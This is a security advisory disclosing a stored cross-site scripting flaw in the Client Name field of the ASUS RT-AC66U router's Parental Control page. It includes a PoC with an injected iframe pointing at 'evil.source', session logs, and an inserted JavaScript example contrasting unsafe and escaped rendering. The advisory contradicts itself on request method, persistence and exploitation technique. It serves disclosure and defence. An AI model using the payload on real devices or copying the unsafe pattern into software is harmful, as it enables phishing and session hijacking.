ASUS WRT-AC66U 3.x Cross Site Scripting

Reported by Lawrence Amer, 11 Jul 2018. Source: packetstorm (packetstormsecurity.com)

ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability in Client Name Input Field of Parental Control Module

Document Title:  
===============  
ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=1993  
  
  
Release Date:  
=============  
2018-06-27  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1993  
  
  
Common Vulnerability Scoring System:  
====================================  
3  
  
  
Vulnerability Class:  
====================  
Cross Site Scripting - Persistent  
  
  
Current Estimated Price:  
========================  
500€ - 1.000€  
  
  
Product & Service Introduction:  
===============================  
802.11ac Dual-Band Wireless-AC1750 Gigabit Router. RT-AC66U supports several  
operation modes to meet different requirements. Please select the mode that  
matches your situation: Wireless router mode (default), Access Point (AP) mode  
or Media bridge. In wireless router / IP sharing mode, RT-AC66U connects to the  
Internet via PPPoE, DHCP, PPTP, L2TP, or Static IP and shares the wireless  
network to LAN clients or devices. In this mode, NAT, firewall, and DHCP server  
are enabled by default. UPnP and Dynamic DNS are supported for SOHO and home  
users. Select this mode if you are a first-time user or you are not currently  
using any wired/wireless routers. The ASUS RT-AC66U is a 5th gen dual-band Wi-Fi  
router, and the launch platform for the new ASUS AiCloud service. Its speed  
reaches 1.75Gbps, utilizing the Broadcom 802.11ac Wi-Fi controller and working  
in 2.4GHz and 5GHz. The 5GHz band supports up to 1.3Gbps, exceeding current  
Gigabit wired transmission and 3X faster than 802.11n. The RT-AC66U offers  
smooth lag-resistant multitasking and super-fast streaming, while ASUS AiRadar  
intelligently strengthens wireless connections via powerful amplification,  
offering future-proof optimized performance.  
  
(Copy of the Homepage: https://www.asus.com/Networking/RTAC66U/ )  
  
  
Abstract Advisory Information:  
==============================  
The Vulnerability Laboratory core research team discovered multiple  
cross site scripting vulnerabilities in the official ASUS Wireless Router  
RT Firmware v3.0.0.4.372_67.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2018-06-27: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
ASUS  
Product: WRT - Wireless Router (UI) 3.0.0.4.372_67  
  
  
Exploitation Technique:  
=======================  
Local  
  
  
Severity Level:  
===============  
Medium  
  
  
Authentication Type:  
====================  
Restricted authentication (user/moderator) - User privileges  
  
  
User Interaction:  
=================  
Low User Interaction  
  
  
Disclosure Type:  
================  
Independent Security Research  
  
  
Technical Details & Description:  
================================  
A cross site scripting vulnerability has been discovered in the ASUS Wireless  
Router RT Firmware v3.0.0.4.372_67. The cross site scripting web vulnerability  
allows remote attackers to inject their own malicious script code on the  
application side of the vulnerable function or service module.  
  
The cross site scripting vulnerability is located in the `Client Name` input  
field of the `Parental Control` module. The client name input is not securely  
parsed, which allows an attacker to manipulate the client list on the index  
page of the module. The request method to inject is POST and the attack vector  
is located on the application side. Because no cookies are reachable in the  
panel UI, low privileged user accounts are only able to redirect or inject  
malware on the client side for execution. The injected context is first saved  
client-side; once the apply function is used, it is saved permanently to the  
image db.  
  
The security risk of the client-side cross site scripting web vulnerability is  
estimated as medium with a CVSS (Common Vulnerability Scoring System) count of  
3.0. Exploitation of the client-side web vulnerability requires a privileged  
web-application user account and low user interaction. Successful exploitation  
of the vulnerability results in non-persistent phishing, session hijacking,  
non-persistent external redirect to malicious sources and client-side  
manipulation of affected or connected web module context.  
  
Request Method(s):  
[+] GET  
  
Vulnerable Module(s):  
[+] Parental Control  
  
Vulnerable Parameter(s):  
[+] Client Name  
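The defect described above is a client name that reaches the parental-control table markup unescaped. The following is an added example, not ASUS firmware code: it contrasts a row renderer that concatenates the stored values as-is (the pattern the PoC below exhibits) with one that applies the field's 32-character limit as a server-side allow-list, checks the MAC format in the spirit of the page's `is_hwaddr()`, and HTML-escapes both values. All function names and the sample rules are assumptions constructed for the example.

```javascript
// Added example (not ASUS firmware code). Names and sample data are assumed.
// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Allow-list for a client name: 1..32 characters from a narrow set.
// The page's input has maxlength="32", but that is enforced only in the
// browser, so the same limit must be applied where the value is stored.
const CLIENT_NAME_RE = /^[A-Za-z0-9 ._-]{1,32}$/;
function isValidClientName(name) {
  return typeof name === 'string' && CLIENT_NAME_RE.test(name);
}

// MAC format check, analogous in intent to the page's is_hwaddr() handler.
const MAC_RE = /^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$/;
function isValidMac(mac) {
  return typeof mac === 'string' && MAC_RE.test(mac);
}

// Vulnerable pattern: untrusted values dropped straight into attribute and
// text context. A name such as "><iframe ... closes the title attribute and
// the td, which is exactly what the advisory's PoC markup shows.
function renderClientRowUnsafe(index, rule) {
  return `<tr id="row${index}"><td title="${rule.name}">${rule.name}</td>` +
    `<td title="${rule.mac}">${rule.mac}</td></tr>`;
}

// Hardened pattern: reject anything outside the allow-list, then escape
// every value before it is placed in the markup.
function renderClientRow(index, rule) {
  if (!isValidClientName(rule.name) || !isValidMac(rule.mac)) {
    throw new Error(`rejected rule ${index}: invalid client name or MAC`);
  }
  const name = escapeHtml(rule.name);
  const mac = escapeHtml(rule.mac);
  return `<tr id="row${index}"><td title="${name}">${name}</td>` +
    `<td title="${mac}">${mac}</td></tr>`;
}

// Constructed sample rules: one benign entry and the injection string from
// the advisory's PoC, paired with the placeholder MAC used there.
const SAMPLE_RULES = [
  { name: 'JIEMING-NB', mac: 'aa:aa:aa:aa:aa:aa' },
  { name: '"><iframe src="evil.source', mac: 'aa:aa:aa:aa:aa:aa' },
];
```

Rendering the second rule through `renderClientRowUnsafe` reproduces the broken `<td title="" <iframe=...` structure seen in the PoC, while `renderClientRow` refuses it before any markup is produced.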
  
  
Proof of Concept (PoC):  
=======================  
The cross site scripting vulnerability can be exploited by remote attackers  
with a privileged user account and low user interaction. For security  
demonstration or to reproduce the vulnerability, follow the provided  
information and steps below.  
  
  
PoC: Exploitation  
<tbody><tr><th title="Select all" width="5%" height="30px"><input  
id="selAll" onclick="selectAll(this, 0);"  
value="" type="checkbox"></th><th width="40%">Clients Name</th><th  
width="25%">Clients MAC Address</th><th width="10%">  
Time Management</th><th width="10%">Add / Delete</th></tr><tr><td  
style="border-bottom:2px solid #000;"  
title="Enable/Disable"><input id="newrule_Enable" checked=""  
type="checkbox"></td><td style="border-bottom:2px solid #000;">  
<input maxlength="32" style="margin-left:10px;float:left;width:255px;"  
class="input_20_table" name="PC_devicename"  
onkeypress="" onclick="hideClients_Block();"  
onblur="if(!over_var){hideClients_Block();}" type="text"><img  
id="pull_arrow"  
src="images/arrow-down.gif" onclick="pullLANIPList(this);" title="Select  
the device name of DHCP clients."  
onmouseover="over_var=1;" onmouseout="over_var=0;" height="14px;"><div  
id="ClientList_Block_PC" class="ClientList_Block_PC">  
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;"  
onclick="setClientIP('JIEMING-NB', '50:E5:49:A2:00:F8');">  
<strong>192.168.1.166</strong> ( JIEMING-NB) </div></a><a><div  
onmouseover="over_var=1;" onmouseout="over_var=0;"  
onclick="setClientIP('JIEMING-MACBOOK',  
'98:4B:E1:CB:DA:D6');"><strong>192.168.1.188</strong> ( JIEMING-MACBOOK)  
</div></a>  
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;"  
onclick="setClientIP('JIEMING-PC', 'A8:26:D9:31:2B:49');">  
<strong>192.168.1.161</strong> ( JIEMING-PC) </div></a><a><div  
onmouseover="over_var=1;" onmouseout="over_var=0;"  
onclick="setClientIP('A8:26:D9:31:2B:49',  
'A8:26:D9:31:2B:49');"><strong>192.168.1.210</strong> </div></a>  
<!--[if lte IE 6.5]><iframe  
class="hackiframe2"></iframe><![endif]--></div></td><td  
style="border-bottom:2px solid #000;">  
<input maxlength="17" class="input_macaddr_table" name="PC_mac"  
onkeypress="return is_hwaddr(this,event)"  
type="text"></td><td style="border-bottom:2px solid #000;">--</td><td  
style="border-bottom:2px solid #000;">  
<input class="url_btn" onclick="addRow_main(16)" value=""  
type="button"></td></tr><tr id="row0"><td title="1">  
<input onclick="genEnableArray_main(0,this);" checked=""  
type="checkbox"></td><td title=""></td>  
<td title="aa:aa:aa:aa:aa:aa">aa:aa:aa:aa:aa:aa</td><td><input  
class="service_btn" onclick="gen_lantowanTable(0);"  
value="" type="button"></td><td><input class="remove_btn"  
onclick="deleteRow_main(this);" value="" type="button"></td></tr>  
<tr id="row1"><td title="undefined"><input  
onclick="genEnableArray_main(1,this);" type="checkbox"></td>  
<td title="" <iframe="" src="evil.source"">"<iframe  
src="evil.source</td"><td title="undefined">undefined</td>  
<td><input class="service_btn" type="button"  
onclick="gen_lantowanTable(1);" value=""/></td><td><input  
class="remove_btn" type="button" onclick="deleteRow_main(this);"  
value=""/></td><tr id="row2"><td title="undefined">  
<input type="checkbox" onclick="genEnableArray_main(2,this);" /></td><td  
title=""></td><td title="undefined">undefined</td>  
<td><input class="service_btn" type="button"  
onclick="gen_lantowanTable(2);" value=""/></td><td>  
<input class="remove_btn" type="button" onclick="deleteRow_main(this);"  
value=""/>  
</td></tr></table></iframe></td></tr></tbody>  
  
  
--- PoC Session Logs [GET] ---  
Status: 304[Not Modified]  
GET http://event.localhost/nw/_ui/en/ParentalControl.html  
Mime Type[text/html]  
Request Header:  
Host[event.localhost]  
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)  
Gecko/20100101 Firefox/49.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]  
Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]  
Connection[keep-alive]  
Upgrade-Insecure-Requests[1]  
If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]  
If-None-Match["31793159796dce1:0"]  
Cache-Control[max-age=0]  
Response Header:  
Content-Type[text/html]  
Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]  
Etag["31793159796dce1:0"]  
Connection[keep-alive]  
-  
Status: 200[OK]  
GET http://event.localhost/nw/_ui/en/evil.source%3C/td  
Mime Type[text/html]  
Request Header:  
Host[event.localhost]  
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)  
Gecko/20100101 Firefox/49.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]  
Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]  
Connection[keep-alive]  
Upgrade-Insecure-Requests[1]  
Response Header:  
Content-Type[text/html]  
Server[Microsoft-IIS/7.5]  
X-Powered-By[ASP.NET]  
Content-Length[1245]  
Connection[keep-alive]  
  
  
Reference(s):  
http://event.localhost/  
http://event.localhost/nw/  
http://event.localhost/nw/_ui/  
  
  
Solution - Fix & Patch:  
=======================  
The issue was reported in 2016 Q4 (2016-11-09) and was finally resolved in  
2017 Q3 - Q4 by the ASUS WRT developer team. The public disclosure process  
took about 10 months.  
  
  
Security Risk:  
==============  
The security risk of the persistent cross site scripting web vulnerability  
in the ASUS WRT UI is estimated as medium (CVSS 3.0).  
  
  
Credits & Authors:  
==================  
Lawrence Amer (Vulnerability Lab Core Research Team) -  
https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as is, without any  
warranty. Vulnerability Lab disclaims all warranties, either expressed or  
implied, including the warranties of merchantability and capability for a  
particular purpose. Vulnerability-Lab or its suppliers are not liable in any  
case of damage, including direct, indirect, incidental, consequential loss of  
business profits or special damages, even if Vulnerability Labs or its suppliers  
have been advised of the possibility of such damages. Some states do not allow  
the exclusion or limitation of liability mainly for incidental or consequential  
damages, so the foregoing limitation may not apply. We do not approve or  
encourage anybody to break any licenses, policies, deface websites, hack into  
databases or trade with stolen data. We have no need for criminal activities or  
membership requests. We do not publish advisories or vulnerabilities of  
religious, militant and racist hacker/analyst/researcher groups or individuals.  
We do not publish trade researcher mails, phone numbers, conversations or  
anything else to journalists, investigative authorities or private individuals.  
  
Domains: www.vulnerability-lab.com - www.vulnerability-db.com -  
www.evolution-sec.com  
Programs: vulnerability-lab.com/submit.php -  
vulnerability-lab.com/list-of-bug-bounty-programs.php -  
vulnerability-lab.com/register.php  
Feeds: vulnerability-lab.com/rss/rss.php -  
vulnerability-lab.com/rss/rss_upcoming.php -  
vulnerability-lab.com/rss/rss_news.php  
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab -  
youtube.com/user/vulnerability0lab  
  
Any modified copy or reproduction, including partial usage, of this file,  
resources or information requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is  
granted. All other rights, including the use of other media, are reserved by  
Vulnerability Lab Research Team or its suppliers. All pictures, texts,  
advisories, source code, videos and other information on this website are  
trademarks of the vulnerability-lab team & the specific authors or managers. To  
record, list, modify, use or edit our material, contact (admin@) to ask for  
permission.  
  
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™  
  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  